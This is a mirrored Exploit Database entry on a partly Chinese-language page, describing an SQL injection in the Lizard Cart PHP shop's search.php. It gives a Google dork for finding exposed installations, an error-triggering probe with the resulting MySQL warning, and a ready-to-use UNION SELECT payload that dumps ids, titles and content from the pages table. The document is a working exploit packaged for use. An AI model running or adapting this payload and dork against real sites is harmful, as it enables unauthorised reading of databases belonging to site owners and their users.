lizard cart – ‘search.php’ SQL Injection

• Exploit Database
• 109 阅读

• 作者： Number 7
  日期： 2012-03-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18561/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  # Exploit Title: [lizard cart SQLi (search.php)] # Google Dork: [inurl:search.php+intitle:"Lizard Cart"+intext:"Search Results:"] # Date: [05-03-2012] # Author: [Number 7] # Software Link: [http://sourceforge.net/projects/lizardcart/files/latest/download?source=directory] # Version: [pp104] # Tested on: [Windows] _____________________________________________________________________________________________ Usage:   http://localhost/liza/search.php?metode=1'   Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\AppServ\www\liza\search.php on line 15   http://localhost/liza/search.php?metode=[SQLi]   search.php?metode=-1+union+select+1,2,concat(id,0x3e,page_title,0x3e,page_content),4,5,6,7,8+from+pages--   Demo: htptp://localhost/liza/search.php?metode=-1+union+select+1,2,concat(id,0x3e,page_title,0x3e,page_content),4,5,6,7,8+from+pages--   _____________________________________________________________________________________________